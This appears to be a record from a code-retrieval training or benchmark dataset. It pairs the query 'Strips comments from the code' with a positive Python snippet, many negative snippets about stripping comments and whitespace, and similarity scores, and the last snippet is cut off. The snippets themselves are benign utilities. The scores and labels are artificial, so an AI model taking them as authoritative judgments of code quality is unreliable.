1:\n return text\n for c in lines[l_idx + 1] :\n if c == ' ' :\n indent += 1\n else : \n break\n\n # if still nothing found, give up\n if not indent :\n return text\n\n\n # oitherwise trim all lines by that indentation\n out = \"\"\n replace = ' ' * indent\n for line in lines :\n out += re.sub (\"%s\" % ' ' * indent, \"\", line)\n out += \"\\n\"\n\n return out", "def lstrip(self) -> String:\n pass", "def clean_comments(self):\n new_lines = list()\n for line in self.lines:\n if ((not line.startswith(\"//\")) & (not line.isspace()) &\n (not line.startswith(\"/*\") & (not line.startswith(\"*/\")))):\n line = Parser.strip_line(line)\n new_lines.append(line)\n self.lines = new_lines", "def strip_space():\n pass", "def _remove_whitespace(file_contents):\n whitespace_stripped = [line.strip() for line in file_contents]\n return [line for line in whitespace_stripped if line != \"\"]", "def test_file_iterator_removes_leading_whitespace(self):\n for line in file_iterator('example_module.py'):\n self.assertFalse(line.startswith(' '))", "def remove_excess_white_space(lines: str):\n two_plus_white_space = r\"\\s{2,}\"\n return re.sub(two_plus_white_space, \"\", lines)", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def emptyline(self):\n pass", "def remove_psuedoinstructions(file_contents):\n return [line for line in file_contents if not line.startswith(\n PSUEDOINSTRUCTION_INDICATOR)]", "def remove_whitespaces(text: str) -> str:\n return text.lstrip().rstrip()", "def strip_warnings(self, line):\n if line[0] == \"|\":\n return \"\"\n else:\n return line", "def _chop_end_codes(line):\n return re.sub(r\"\\s\\s\\s\\s+[\\w]{4}.\\s+\\d*\\Z\", \"\", line)", "def test_remove_blank_lines(self):\n before_b = \"\"\"\\\n first line\n\n line 1\n line a\n line b\n\n line c\n last line\n \"\"\"\n after_b = \"\"\"\\\n first line\n line 1\n line a\n line b\n line c\n last line\n \"\"\"\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"1.0\", \"9.0\"),\n after_sel=(\"1.0\", \"6.9\"),\n command_name=\"remove-blank-lines\",\n )", "def filter_blanks(user, str):\n return re.sub(r'\\n{2}\\n+', '\\n', str)", "def remove_blanks_list(src):\n return [el for el in src if el]", "def clean(source_name):\n with open(source_name, 'r') as f:\n text = f.read()\n text_list = re.split('; |, |\\n| |\\!|\\?', text)\n if '' in text_list:\n text_list = list(filter(lambda x: x != \" \" and x != \"\", text_list))\n return text_list", "def _trim(self, docstring):\n if not docstring:\n return ''\n # Convert tabs to spaces (following the normal Python rules)\n # and split into a list of lines:\n lines = docstring.expandtabs().splitlines()\n # Determine minimum indentation (first line doesn't count):\n indent = sys.maxsize\n for line in lines[1:]:\n stripped = line.lstrip()\n if stripped:\n indent = min(indent, len(line) - len(stripped))\n # Remove indentation (first line is special):\n trimmed = [lines[0].strip()]\n if indent < sys.maxsize:\n for line in lines[1:]:\n trimmed.append(line[indent:].rstrip())\n # Strip off trailing and leading blank lines:\n while trimmed and not trimmed[-1]:\n trimmed.pop()\n while trimmed and not trimmed[0]:\n trimmed.pop(0)\n # Return a single string:\n return '\\n'.join(trimmed)", "def clean_data(self):\n for line in self.file:\n if line.startswith('//') or line.isspace():\n continue\n if '//' in line:\n line = line.split('//')[0]\n line = line.replace('\\n', '')\n line = line.replace(' ','')\n self.commands.append(line)", "def emptyline(self):\n self.do_ls(\"\")", "def emptyline(self):\n return", "def emptyline(self):\n return", "def clean_whitespace(text):\n return text\n #return re.sub(r'\\r\\n|\\n', \"\\t\", text)", "def nonempty_lines(text):\n return [line for line in text.split('\\n') if line]", "def __remove_line_numbers(file_contents: str) -> str:\n\n spaces = ' ' * 6\n result = ''\n\n for line in file_contents.splitlines():\n new_line = spaces + line[6:72].rstrip()\n result += new_line + '\\n'\n\n return result", "def clean_code(code):\n return code", "def prepare_file(lines):\n return \" \".join(line.strip() for line in lines)", "def strip(notebook):\n for cell in notebook.cells:\n if cell.cell_type == 'code':\n cell.outputs = []\n cell.execution_count = None", "def remove_empty_lines(file_name):\n removed_lines = 0\n with open(file_name, mode=\"r\", encoding=\"utf-8\") as fd:\n with open(get_output_file(file_name), mode=\"w\", encoding=\"utf-8\") as ofd:\n for line in fd.readlines():\n if re.search(\"^$\", line):\n removed_lines += 1\n else:\n ofd.write(line)\n print(\"Removed lines: {}\".format(removed_lines))", "def ostrip(thefile):\n outlines = []\n with open(thefile, 'r') as f:\n for line in f:\n if line[0] != '%':\n if '%' in line:\n if r'\\%' in line or line[-1] == '%':\n outlines.append(line) # these are not real comments\n else:\n outlines.append(line.split(' %')[0]+'\\n')\n else:\n outlines.append(line)\n return outlines", "def _unmunge_multiline_jinja2(lines):\n start_slug = \"# {# \" + JINJA2_ML_SLUG\n start = len(start_slug)\n stop = len(\" #}\\n\")\n new_lines = []\n for line in lines:\n if line.startswith(start_slug):\n new_lines.append(line[start:-stop] + \"\\n\")\n else:\n new_lines.append(line)\n return new_lines", "def no_blank_line_after_last_section(): # noqa: D416", "def strip_text(text):\n\n return [line.strip() for line in text.splitlines()]", "def strip(self, src):\r\n # single-quoted character\r\n p = \"('.')\"\r\n \r\n # double-quoted string\r\n p += \"|(\\\"(?:[^\\\"\\\\\\\\]|\\\\\\\\.)*\\\")\"\r\n \r\n # single and multi-line comment\r\n p += \"|(//.*?$)|(/\\\\*[^*]*(?:\\\\*(?!/)[^*]*)*\\\\*/)\"\r\n \r\n # pre-processor directive\r\n p += \"|\" + \"(^\\\\s*#.*?$)\"\r\n\r\n regex = re.compile(p, re.MULTILINE)\r\n return regex.sub(' ', src)", "def maybe_remove_new_line(code):\n lines = code.split(\"\\n\")\n\n if lines[0] in [\"py\", \"python\"]:\n # add new line before last line being ```\n lines = lines[:-2] + lines[-1:]\n\n return \"\\n\".join(lines)", "def removeSingleChars(self) -> None:\n self.text = re.sub('\\s[^\\n\\s]\\s', ' ', self.text)", "def remove_empty_lines(self, string_list):\r\n string_list2 = []\r\n for strn in string_list:\r\n if strn:\r\n line = strn.strip()\r\n if line == \"\":\r\n continue\r\n else:\r\n string_list2.append(line)\r\n return string_list2", "def _reset_leading_whitespace(self):\n self._leading_whitespace = ''", "def _skip_whitespace(self):\n whitespace_re = re.compile(r'\\s*')\n return whitespace_re.match(self.body, self.pos).end()", "def _purify(self, line_str):\n string = line_str.strip('\\n')\n string = string.strip()\n comment_idx = string.find('//')\n if comment_idx == -1:\n return string.strip()\n elif comment_idx == 0:\n return None\n else:\n return string[0:comment_idx].strip()", "def no_underline_and_no_newline(): # noqa: D416", "def rstrip_line(line):\n return line.rstrip()", "def remove_unc(array):\r\n\tnew_arr = []\r\n\r\n\tdef checkForNewLineAndSemiColon(string):\r\n\t\t\"\"\"delete the new-line character and semi-colon from the string\"\"\"\r\n\t\tnew_string = \"\"\r\n\t\tfor i in string:\r\n\t\t\tif i != \"\\n\" and i != \";\":\r\n\t\t\t\tnew_string += i\r\n\t\treturn new_string\r\n\r\n\tfor i in range(len(array)):\r\n\t\tif array[i] != '' and array[i] != \"package\":\r\n\t\t\tnew_arr.append(checkForNewLineAndSemiColon(array[i]))\r\n\r\n\treturn new_arr[0]", "def remove_whitespace_rarity(s, i):\n text = s.replace(' ', '')\n if os.linesep.join([s for s in text.splitlines() if s]) == '':\n return('None')\n else:\n return(os.linesep.join([s for s in text.splitlines() if s]))", "def strip_newlines(text):\n return text.replace('\\n', ' ').replace('\\r', '').rstrip()", "def remove_curl_debug_lines(text: str) -> str:\n lines = text.split(\"\\n\")\n lines = [line for line in lines if not line.startswith(\"**\")]\n return \"\\n\".join(lines)", "def clean_indent(txt):\n return \"\\n\".join(x.strip() for x in txt.splitlines())", "def clean_header(klass, s):\n return re.sub(r\"[\\n\\r\\t]+\", \" \", s).strip()", "def clean_inp(self):\n self.E_str = \"clean_inp\"\n\n # First remove any comment lines\n new_ltxt = []\n for line_num, line in enumerate(self.file_ltxt):\n edit_line, comment = gen_parse.rm_comment_from_line(line)\n edit_line = edit_line.rstrip()\n if edit_line:\n new_ltxt.append(edit_line)\n self.file_ltxt = new_ltxt[:]\n\n # Get line nums for error messages -before the inp cleaning\n self.line_nums = list(range(1, len(self.file_ltxt)+1))\n for line_num in self.line_nums:\n self.file_ltxt_orig[line_num] = self.file_ltxt[line_num - 1]\n self.line_num = 0\n\n self.clean_open_close_brace()", "def list_strip(line: list):\n new_line = [field.strip() for field in line]\n if new_line != line:\n tpl = \"Removed trailing whitespaces in fields of line: {}\"\n msg = tpl.format(line)\n warnings.warn(msg, ParseIsatabWarning)\n return new_line", "def _sanitize(text):\n # TODO: any cleanup needed here?\n if text is None:\n return None\n text = text.replace('\\n', ' ')\n return text" ]
[ "0.7114437", "0.70919764", "0.7068101", "0.68381476", "0.6802601", "0.6799396", "0.6789069", "0.66894", "0.66618234", "0.66358346", "0.6598233", "0.6583519", "0.6565634", "0.6527385", "0.6515068", "0.6499719", "0.64757967", "0.64706796", "0.6467208", "0.6441668", "0.6440686", "0.643431", "0.6430323", "0.64226955", "0.64226955", "0.6420396", "0.6400788", "0.63433003", "0.633698", "0.6335082", "0.6310171", "0.62877697", "0.6281884", "0.62523764", "0.6248172", "0.62476593", "0.6242683", "0.62370265", "0.6220258", "0.6216033", "0.6215483", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6208205", "0.6188429", "0.61845666", "0.61692584", "0.61530954", "0.6152583", "0.6106047", "0.6105662", "0.609959", "0.608714", "0.6085406", "0.6063757", "0.60496235", "0.60496235", "0.6044162", "0.6026976", "0.60070664", "0.6005833", "0.59883356", "0.5985926", "0.59854496", "0.59830076", "0.5982913", "0.5981406", "0.5978803", "0.5976542", "0.59763354", "0.5976014", "0.59721833", "0.59613717", "0.59575087", "0.5953442", "0.5952412", "0.59472567", "0.59294045", "0.5924408", "0.59230465", "0.59177685", "0.5914652", "0.5900389", "0.5877675", "0.5876662", "0.58663875" ]
0.68966925
3
Strips comments from the code
def strip_comments(blob, delim='#'): lines = blob.split('\n') return '\n'.join([line for line in lines if line.strip()[0] != delim])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _removeComments(code):\r\n # remove all occurance streamed comments (/*COMMENT */) from string\r\n text = re.sub(re.compile('/\\*.*?\\*/', re.DOTALL), '', code)\r\n # remove all occurance singleline comments (//COMMENT\\n ) from string\r\n return re.sub(re.compile('//.*?\\n'), '', text)", "def remove_comments(s):\n return \"\\n\".join(l for l in s.strip().split(\"\\n\") if not l.strip().startswith(\"#\"))", "def remove_comments(ls):\r\n for i in range(len(ls)):\r\n ls[i] = re.sub(r'//.*', '', ls[i])\r\n\r\n return ls", "def remove_comments(line):\n hashPos = line.find('#')\n return line[:hashPos] if hashPos >= 0 else line", "def remove_comments(html):\n return re.sub(r\"<!--.*?-->\", \" \", html)", "def strip_comments(line):\n if \"#\" in line:\n return line[:line.find(\"#\")]\n else:\n return line", "def clean_comments(self):\n new_lines = list()\n for line in self.lines:\n if ((not line.startswith(\"//\")) & (not line.isspace()) &\n (not line.startswith(\"/*\") & (not line.startswith(\"*/\")))):\n line = Parser.strip_line(line)\n new_lines.append(line)\n self.lines = new_lines", "def DropComment(text):\n grp = re.compile(r'/\\*[^/]*\\*/').split(text)\n result = string.join(grp);\n grp = re.compile(r'//.*').split(result);\n result = string.join(grp);\n #result = string.join(result.split('\\n')) #remove the line break\n return(' '+result);", "def removeHtmlComments(self, text):\n sb = []\n start = text.find(u'<!--')\n last = 0\n while start != -1:\n end = text.find(u'-->', start)\n if end == -1:\n break\n end += 3 \n \n spaceStart = max(0, start-1)\n spaceEnd = end\n while text[spaceStart] == u' ' and spaceStart > 0:\n spaceStart -= 1\n while text[spaceEnd] == u' ':\n spaceEnd += 1\n \n if text[spaceStart] == u'\\n' and text[spaceEnd] == u'\\n':\n sb.append(text[last:spaceStart])\n sb.append(u'\\n')\n last = spaceEnd+1\n else:\n sb.append(text[last:spaceStart+1])\n last = spaceEnd\n \n start = text.find(u'<!--', end)\n sb.append(text[last:])\n return u''.join(sb)", "def __clean_line_comments(self):\n self.lines = [l for l in self.lines if not l.startswith(\"//\") and len(l) != 0]", "def __clean_line_comments(self):\n self.lines = [l for l in self.lines if not l.startswith(\"//\") and len(l) != 0]", "def _strip_comments(file_contents):\n lines_without_comments = []\n for line in file_contents:\n comment_position = line.find(COMMENT_INDICATOR)\n if comment_position != -1:\n lines_without_comments.append(line[:comment_position])\n else:\n lines_without_comments.append(line)\n return lines_without_comments", "def strip_comments(source):\n\n tokens = (\n 'PERCENT',\n 'BEGINCOMMENT', 'ENDCOMMENT',\n 'BACKSLASH',\n 'CHAR',\n 'BEGINVERBATIM', 'ENDVERBATIM',\n 'BEGINLISTING', 'ENDLISTING',\n 'NEWLINE',\n 'ESCPCT',\n )\n states = (\n ('linecomment', 'exclusive'),\n ('commentenv', 'exclusive'),\n ('verbatim', 'exclusive'),\n ('listing', 'exclusive'),\n )\n\n #Deal with escaped backslashes, so we don't think they're escaping %.\n def t_BACKSLASH(t):\n r\"\\\\\\\\\"\n return t\n\n #One-line comments\n def t_PERCENT(t):\n r\"\\%\"\n t.lexer.begin(\"linecomment\")\n return None\n\n #Escaped percent signs\n def t_ESCPCT(t):\n r\"\\\\\\%\"\n return t\n\n #Comment environment, as defined by verbatim package\n def t_BEGINCOMMENT(t):\n r\"\\\\begin\\s*{\\s*comment\\s*}\"\n t.lexer.begin(\"commentenv\")\n return None\n\n #Verbatim environment (different treatment of comments within)\n def t_BEGINVERBATIM(t):\n r\"\\\\begin\\s*{\\s*verbatim\\s*}\"\n t.lexer.begin(\"verbatim\")\n return t\n\n #Listings environment (different treatment of comments within)\n def t_BEGINLISTING(t):\n r\"\\\\begin\\s*{\\s*lstlisting\\s*}\"\n t.lexer.begin(\"listing\")\n return t\n\n #Any other character in initial state we leave alone\n def t_CHAR(t):\n r\".\"\n return t\n\n def t_NEWLINE(t):\n r\"\\n\"\n return t\n\n #End comment environment\n def t_commentenv_ENDCOMMENT(t):\n r\"\\\\end\\s*{\\s*comment\\s*}\"\n #Anything after \\end{comment} on a line is ignored!\n t.lexer.begin('linecomment')\n return None\n\n #Ignore comments of comment environment\n def t_commentenv_CHAR(t):\n r\".\"\n return None\n\n def t_commentenv_NEWLINE(t):\n r\"\\n\"\n return None\n\n #End of verbatim environment\n def t_verbatim_ENDVERBATIM(t):\n r\"\\\\end\\s*{\\s*verbatim\\s*}\"\n t.lexer.begin('INITIAL')\n return t\n\n #End of listing environment\n def t_listing_ENDLISTING(t):\n r\"\\\\end\\s*{\\s*lstlisting\\s*}\"\n t.lexer.begin('INITIAL')\n return t\n\n #Leave contents of verbatim/listing environment alone\n def t_verbatim_listing_CHAR(t):\n r\".\"\n return t\n\n def t_verbatim_listing_NEWLINE(t):\n r\"\\n\"\n return t\n\n\n #End a % comment when we get to a new line\n def t_linecomment_ENDCOMMENT(t):\n r\"\\n\"\n t.lexer.begin(\"INITIAL\")\n #Newline at the end of a line comment is stripped.\n return None\n\n #Ignore anything after a % on a line\n def t_linecomment_CHAR(t):\n r\".\"\n return None\n\n #Print errors\n def t_ANY_error(t):\n print(t.value, file=sys.stderr)\n\n lexer = ply.lex.lex()\n lexer.input(source)\n return u\"\".join([tok.value for tok in lexer])", "def decomment_and_normalize(s):\n index = s.find(inline_comment_start)\n if index != -1:\n s = s[0:index]\n return s.strip(inline_whitespace)", "def clean_comment(line):\n if line.startswith(\"#!\"):\n line = line[2:]\n else:\n line = line[1:]\n if line.startswith(\" \"):\n line = line[1:]\n if not line.endswith('\\n'):\n line += '\\n'\n return line", "def _purify(self, line_str):\n string = line_str.strip('\\n')\n string = string.strip()\n comment_idx = string.find('//')\n if comment_idx == -1:\n return string.strip()\n elif comment_idx == 0:\n return None\n else:\n return string[0:comment_idx].strip()", "def remove_comments(code):\n state = ReadState.NORMAL\n escape = False\n result = ''\n i = 0\n while i < (len(code)):\n c = code[i]\n if state == ReadState.NORMAL:\n if c == '\"':\n state = ReadState.STRING\n escape = False\n if i + 1 < len(code):\n if c + code[i + 1] == '//':\n state = ReadState.SINGLE_COMMENT\n i += 2\n continue\n if c + code[i + 1] == '/*':\n state = ReadState.MULTI_COMMENT\n i += 2\n continue\n result += c\n elif state == ReadState.STRING:\n if escape:\n escape = False\n else:\n if c == '\"':\n state = ReadState.NORMAL\n if c == '\\\\':\n escape = True\n result += c\n elif state == ReadState.SINGLE_COMMENT:\n if c == '\\n':\n state = ReadState.NORMAL\n result += c\n elif state == ReadState.MULTI_COMMENT:\n if i + 1 < len(code):\n if c + code[i + 1] == '*/':\n state = ReadState.NORMAL\n i += 1\n i += 1\n return result", "def cleanup_comments(comments):\n clean_comments = []\n\n if comments:\n for comment in comments:\n cleaned_up = sub(r'\\n\\n {8}\\n {8}\\n {12}\\n {16}\\n {16}\\n {12}\\nEdit', '', comment)\n clean_comments.append(cleaned_up)\n\n return clean_comments", "def decomment(string):\n pattern = r\"//.*|/\\*[\\s\\S]*?\\*/|(\\\"(\\\\.|[^\\\"])*\\\"|'(\\\\.|[^\\'])*')\"\n regex = re.compile(pattern)\n return regex.sub(lambda m: m.group(1), string)", "def comment():", "def strip_docstring(blob):\n docstring = True\n while docstring == True:\n match_docstring = re.search('\\n\\s*\"\"\"[^\"\"\"]*\"\"\"', blob)\n if not match_docstring:\n docstring = False\n else:\n blob = blob.replace(blob[match_docstring.span()[0]:match_docstring.span()[1]], '')\n return blob", "def comment_remover(text):\n\n def replacer(match):\n s = match.group(0)\n if s.startswith(\"/\"):\n return \"\"\n else:\n return s\n\n pattern = re.compile(\n r'//.*?$|/\\*.*?\\*/|\\'(?:\\\\.|[^\\\\\\'])*\\'|\"(?:\\\\.|[^\\\\\"])*\"',\n re.DOTALL | re.MULTILINE,\n )\n return re.sub(pattern, replacer, text)", "def remove_paired_comments(self, program):\n regions = re.compile(\"(/\\*|\\*/)\").split(program)\n depth = 0\n output = []\n for i in range(len(regions)):\n region = regions[i]\n if region==\"/*\":\n depth+=1\n elif region==\"*/\":\n depth-=1\n else:\n #print(\" \"*depth, region.replace(\"\\n\", \"_\"))\n if depth==0:\n output.append(region)\n return \"\".join(output)", "def split_comment(cls, code):\r\n if '#' not in code: return code\r\n #: Remove comments only (leave quoted strings as they are)\r\n subf = lambda m: '' if m.group(0)[0]=='#' else m.group(0)\r\n return re.sub(cls.re_pytokens, subf, code)", "def remove_comment_header(code):\n # get the line number when the comment header ends (incl. empty lines)\n ln_pos = 0\n for line in code.splitlines(True):\n if re.match(r\"[ \\t]*(%|\\n)\", line):\n ln_pos += 1\n else:\n break\n\n if ln_pos > 0:\n # remove the header block and empty lines from the top of the code\n try:\n code = code.split(\"\\n\", ln_pos)[ln_pos:][0]\n except IndexError:\n # only header and empty lines.\n code = \"\"\n\n return code", "def comment_content(c):\n content = str(c)[4:-3]\n return content.strip()", "def remove_comments_and_docstrings(source):\n io_obj = StringIO(source)\n out = \"\"\n prev_toktype = tokenize.INDENT\n last_lineno = -1\n last_col = 0\n for tok in tokenize.generate_tokens(io_obj.readline):\n token_type = tok[0]\n token_string = tok[1]\n start_line, start_col = tok[2]\n end_line, end_col = tok[3]\n ltext = tok[4]\n # The following two conditionals preserve indentation.\n # This is necessary because we're not using tokenize.untokenize()\n # (because it spits out code with copious amounts of oddly-placed\n # whitespace).\n if start_line > last_lineno:\n last_col = 0\n if start_col > last_col:\n out += (\" \" * (start_col - last_col))\n # Remove comments:\n if token_type == tokenize.COMMENT:\n pass\n # This series of conditionals removes docstrings:\n elif token_type == tokenize.STRING:\n if prev_toktype != tokenize.INDENT:\n # This is likely a docstring; double-check we're not inside an operator:\n if prev_toktype != tokenize.NEWLINE:\n # Note regarding NEWLINE vs NL: The tokenize module\n # differentiates between newlines that start a new statement\n # and newlines inside of operators such as parens, brackes,\n # and curly braces. Newlines inside of operators are\n # NEWLINE and newlines that start new code are NL.\n # Catch whole-module docstrings:\n if start_col > 0:\n # Unlabelled indentation means we're inside an operator\n out += token_string\n # Note regarding the INDENT token: The tokenize module does\n # not label indentation inside of an operator (parens,\n # brackets, and curly braces) as actual indentation.\n # For example:\n # def foo():\n # \"The spaces before this docstring are tokenize.INDENT\"\n # test = [\n # \"The spaces before this string do not get a token\"\n # ]\n\n else:\n out += token_string\n prev_toktype = token_type\n last_col = end_col\n last_lineno = end_line\n out = '\\n'.join([line for line in out.splitlines() if line.strip()])\n return out", "def comment_stripper(iterator):\n for line in iterator:\n if line [:1] == '#':\n continue\n if not line.strip ():\n continue\n yield line", "def test_remove_single_line_comments_noannotation():\n\n\tinput_ = \"\"\"line1\n\t\t\t\tline2 \n\t\t\t\t//comment\n\t\t\t\tline3 \"\"\"\n\n\texpect = \"\"\"line1\n\t\t\t\tline2 \n\t\t\t\t\n\t\t\t\tline3 \"\"\"\n\n\tassert aunit.remove_single_line_comments(input_) == expect", "def _dump_comment(comment: List[str]) -> List[str]:\n return [\"/**\"] + comment + [\"*/\"]", "def remove_comments(css):\n log.debug(\"Removing all Comments.\")\n iemac, preserve = False, False\n comment_start = css.find(\"/*\")\n while comment_start >= 0: # Preserve comments that look like `/*!...*/`.\n # Slicing is used to make sure we dont get an IndexError.\n preserve = css[comment_start + 2:comment_start + 3] == \"!\"\n comment_end = css.find(\"*/\", comment_start + 2)\n if comment_end < 0:\n if not preserve:\n css = css[:comment_start]\n break\n elif comment_end >= (comment_start + 2):\n if css[comment_end - 1] == \"\\\\\":\n # This is an IE Mac-specific comment; leave this one and the\n # following one alone.\n comment_start = comment_end + 2\n iemac = True\n elif iemac:\n comment_start = comment_end + 2\n iemac = False\n elif not preserve:\n css = css[:comment_start] + css[comment_end + 2:]\n else:\n comment_start = comment_end + 2\n comment_start = css.find(\"/*\", comment_start)\n return css", "def strip_comments(tokens):\n prev_typ = None\n prev_end_col = 0\n for typ, tok, (start_row, start_col), (end_row, end_col), line in tokens:\n if typ in (tokenize.NL, tokenize.NEWLINE):\n if prev_typ in (tokenize.NL, tokenize.NEWLINE):\n start_col = 0\n else:\n start_col = prev_end_col\n end_col = start_col + 1\n elif typ == tokenize.COMMENT and start_row > 2:\n continue\n prev_typ = typ\n prev_end_col = end_col\n yield typ, tok, (start_row, start_col), (end_row, end_col), line", "def remove_c_style_comments(fd):\n ret = []\n comment_state = False\n for line in fd:\n while True:\n # seems we have nothing left\n if len(line) < 2:\n break\n # we're still inside a comment\n if comment_state:\n idx = line.find(\"*/\")\n if idx > -1:\n line = line[idx + 2:]\n comment_state = False\n continue\n # comment doesn't seem to end on this line\n break\n # we're not inside any comment\n else:\n idx = line.find(\"/*\")\n if idx > -1:\n line = line[idx + 2:]\n comment_state = True\n continue\n if \"//\" in line:\n line = line.split(\"//\", 1)[0]\n # only now we can actually do our job\n line = line.strip()\n if len(line) > 0:\n ret.append(line)\n break\n return ret", "def _StripCommentFromLine(line):\n\n m = re.match(r'(.*)//', line)\n if m:\n return m.group(1).strip() + '\\n'\n else:\n return line", "def strip_comments(string, comment_symbols=frozenset(('#', '//'))): # pragma: no cover\n lines = string.splitlines()\n for k in range(len(lines)):\n for symbol in comment_symbols:\n lines[k] = strip_comment_line_with_symbol(lines[k], start=symbol)\n return '\\n'.join(lines)", "def remove_starting_comments(sql: str) -> str:\n commentless_sql = sql\n while True:\n start_comment = COMMENT_START_SQL_RE.match(commentless_sql)\n if start_comment is None:\n break\n commentless_sql = commentless_sql[start_comment.end() :]\n return commentless_sql", "def deleteComments(self: Self, event: Event = None) -> None:\n #@+<< deleteComments docstring >>\n #@+node:ekr.20171123135625.37: *3* << deleteComments docstring >>\n #@@pagewidth 50\n #@-<< deleteComments docstring >>\n c, p, u, w = self, self.p, self.undoer, self.frame.body.wrapper\n #\n # \"Before\" snapshot.\n bunch = u.beforeChangeBody(p)\n #\n # Initial data.\n head, lines, tail, oldSel, oldYview = self.getBodyLines()\n if not lines:\n g.warning('no text selected')\n return\n # The default language in effect at p.\n language = c.frame.body.colorizer.scanLanguageDirectives(p)\n if c.hasAmbiguousLanguage(p):\n language = c.getLanguageAtCursor(p, language)\n d1, d2, d3 = g.set_delims_from_language(language)\n #\n # Calculate the result.\n changed, result = False, []\n if d1:\n # Remove the single-line comment delim in front of each line\n d1b = d1 + ' '\n n1, n1b = len(d1), len(d1b)\n for s in lines:\n i = g.skip_ws(s, 0)\n if g.match(s, i, d1b):\n result.append(s[:i] + s[i + n1b :])\n changed = True\n elif g.match(s, i, d1):\n result.append(s[:i] + s[i + n1 :])\n changed = True\n else:\n result.append(s)\n else:\n # Remove the block comment delimiters from each line.\n n2, n3 = len(d2), len(d3)\n for s in lines:\n i = g.skip_ws(s, 0)\n j = s.find(d3, i + n2)\n if g.match(s, i, d2) and j > -1:\n first = i + n2\n if g.match(s, first, ' '):\n first += 1\n last = j\n if g.match(s, last - 1, ' '):\n last -= 1\n result.append(s[:i] + s[first:last] + s[j + n3 :])\n changed = True\n else:\n result.append(s)\n if not changed:\n return\n #\n # Set p.b and w's text first.\n middle = ''.join(result)\n p.b = head + middle + tail # Sets dirty and changed bits.\n w.setAllText(head + middle + tail)\n #\n # Set the selection range and scroll position.\n i = len(head)\n j = ins = max(i, len(head) + len(middle) - 1)\n w.setSelectionRange(i, j, insert=ins)\n w.setYScrollPosition(oldYview)\n #\n # \"after\" snapshot.\n u.afterChangeBody(p, 'Indent Region', bunch)", "def ostrip(thefile):\n outlines = []\n with open(thefile, 'r') as f:\n for line in f:\n if line[0] != '%':\n if '%' in line:\n if r'\\%' in line or line[-1] == '%':\n outlines.append(line) # these are not real comments\n else:\n outlines.append(line.split(' %')[0]+'\\n')\n else:\n outlines.append(line)\n return outlines", "def strip_comments(string, comment_symbols=frozenset(('#', '//'))):\n lines = string.splitlines()\n for k in range(len(lines)):\n for symbol in comment_symbols:\n lines[k] = strip_comment_line_with_symbol(lines[k], start=symbol)\n return '\\n'.join(lines)", "def filter_comments(asm_utf):\n comments = []\n # removes nones\n a = filter(lambda x: x != None, asm_utf)\n # splits on comment token\n comments = [re.split(\";\", line) for line in a]\n # takes only those that have a comment token\n comments = list(filter(lambda x: len(x) > 1, comments))\n # strips the whitespace from those tokens\n comments = [line[1].strip() for line in comments]\n # removes the singleton chars\n comments = list(filter(lambda x: len(x) > 1, comments))\n # regex to remove section markers and extraneous tabs\n # left over by poor reading of files\n comments = [re.sub('([-=].*[-=]|\\t)', '', line) for line in comments]\n comments = list(filter(lambda x: x != '', comments))\n return comments", "def remove_html_comments(html): # Grunt uses comments to as build arguments, bad practice but still.\n log.debug(\"\"\"Removing all unnecessary HTML comments; Keep all containing:\n 'build:', 'endbuild', '<!--[if]>', '<![endif]-->' for Grunt/Grymt, IE.\"\"\")\n return re.compile('<!-- [^(build|endbuild)].*? -->', re.I).sub('', html)", "def comment_remover(string):\n def replacer(match):\n s = match.group(0)\n if s.startswith('/'):\n return \" \" # note: a space and not an empty string\n else:\n return s\n pattern = re.compile(\n r'//.*?$|/\\*.*?\\*/|\\'(?:\\\\.|[^\\\\\\'])*\\'|\"(?:\\\\.|[^\\\\\"])*\"',\n re.DOTALL | re.MULTILINE\n )\n return re.sub(pattern, replacer, string)", "def __remove_c_comments(self, line):\n new_chars = []\n i = 0\n while i < len(line):\n blocks = self.__ingest_c_block_comments(line, i)\n if blocks > 0:\n i += blocks\n continue\n\n whitespace = self.__ingest_whitespace(line, i)\n if whitespace > 0:\n new_chars.append(' ')\n i += whitespace\n continue\n\n comm_start = self.__ingest_c_comment_start(line, i)\n if comm_start == -1:\n new_chars.append(' ')\n break\n elif comm_start > 0:\n new_chars.append(' ')\n i += comm_start\n\n if blocks + whitespace + comm_start == 0:\n new_chars.append(line[i])\n i += 1\n\n new_line = ''.join(new_chars)\n return new_line", "def remove_comments_from_line(self, line):\n comment_start = line.find('$')\n if (comment_start >= 0):\n line = line[:comment_start]\n return line.lower()", "def remove_html_comment(html_data):\n html_data = re.compile('<!--(.*?)-->', re.MULTILINE|re.DOTALL).sub(\"\", html_data)\n return html_data", "def getComments(source):\n\n markup = []\n for f in source:\n markup += extractMarkup(f)\n\n docs = collateDocs(markup)\n return docs", "def __remove_fortran_comments(self, line):\n if self._in_block_comment:\n log.error('Before Fortran line is processed, in a block comment?')\n\n new_chars = []\n line_len = len(line)\n ignore_spaces = False\n for i in range(line_len):\n if line[i] == ' ':\n if not ignore_spaces:\n ignore_spaces = True\n new_chars.append(' ')\n elif line[i] == '!':\n new_chars.append(' ')\n break\n else:\n ignore_spaces = False\n new_chars.append(line[i])\n\n if self._in_block_comment:\n log.error('Processing Fortran comment left state in a block comment?')\n\n new_line = ''.join(new_chars)\n return new_line", "def extract_comment_py():\n debug(\"extract comment from a python script.\")\n for line in CURRENT_BUFFER[:3]:\n if re.search(r\"coding[:=]\\s*([-\\w.]+)\", line):\n pattern = re.compile(r\"coding[:=]\\s*(?P<encoding>[-\\w.]+)\")\n globals()['ENCODING'] = pattern.search(line).group('encoding')\n debug(\"found encoding: %s\" % globals()['ENCODING'])\n\n lines = list(CURRENT_BUFFER)\n for (i, iline) in enumerate(lines[:10]):\n # find \"\"\" or ''' in the first few lines.\n if '\"\"\"' in iline or \"'''\" in iline:\n # find the end of it.\n breaker = '\"\"\"' if '\"\"\"' in iline else \"'''\"\n for j, jline in enumerate(lines[i+1:]):\n if breaker in jline:\n # found it, format the comment a little bit.\n if j == 0:\n # in 